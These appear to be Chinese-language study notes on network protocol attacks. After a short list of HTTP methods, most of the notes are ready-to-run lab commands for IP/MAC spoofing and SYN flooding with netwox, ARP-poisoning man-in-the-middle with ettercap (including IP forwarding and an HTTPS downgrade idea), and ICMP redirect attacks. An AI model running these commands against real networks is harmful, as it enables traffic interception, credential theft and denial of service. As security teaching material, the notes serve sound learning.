协议攻击
一.什么是协议
网络协议是通信计算机双方必须共同遵从的一组约定。
什么是安全?
违背开发者建设者使用者意愿的都可以称之为安全隐患
ISO是一个标准组织
二.HTTP请求有八种请求
- GET请求:最长300多位
- HEAD请求:跟GET请求一样,不过只会返回请求头,不会返回请求体
- POST请求:是用表单提交,
- PUT请求:向指定资源位置上传其最新内容。
- DELETE请求:请求删除Request-URI所标识的资源
- TRACE请求:回显服务器收到的请求,主要用于测试或诊断
- OPTIONS请求:这个方法可以看服务器支持哪些HTTP的请求方式
- CONNECT请求:是HTTP/1.1 差不多就是保留的请求方式,生产上用的特别少
三.伪造IP攻击命令
netwox 52 -E "0:1:2:3:4:5" -I "192.168.100.125" -e "00:0c:29:83:36:d7" -i "192.168.100.151"
netwox是工具 52是伪造IP攻击方式 MAC是伪造后的MAC 伪造的IP地址 伪造的MAC地址 目标IP地址
netwox 76 -i 192.168.100.151 -p 80
76 是syn泛洪且发送一次tcp连接请求,就改一次源IP 选择ip和端口就可以了
netstat -antu|grep :80
查看80端口连接的状态
tcpdump –i eth0 tcp port 80 -n –nn
查看eth0网卡的80端口的数据包
四.ARP欺诈
ARP欺诈就是利用ARP广播寻找IP的方式来进行欺诈
一直保持这种欺诈关系就要利用ARP毒化,受害者发送一次,攻击者发送一百次,受害者一发送就被覆盖了
ettercap -i eth0 -Tq -M arp:remote /192.168.100.142// /192.168.100.1//
选择ettercap工具 选择网卡 +目标主机IP +网关IP
开启kali转发功能
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
开启监听本地网卡
ettercap -Tq -i eth0
如果目标访问的是https的网站,可以利用中间人降为攻击,
有两种方式,一种是左右两方都是https协议你跟服务器端做加解密
第二种是中间人和受害者是http协议,中间人和服务器端是https的
五.ICMP重定向攻击
echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 1 > /proc/sys/net/ipv4/conf/eth0/accept_redirects
echo 1 > /proc/sys/net/ipv4/conf/default/accept_redirects
以上三个全置为一
netwox 86 -g 192.168.100.148 -i 192.168.100.2
工具名 攻击编号 选择 自己的IP 选择 网关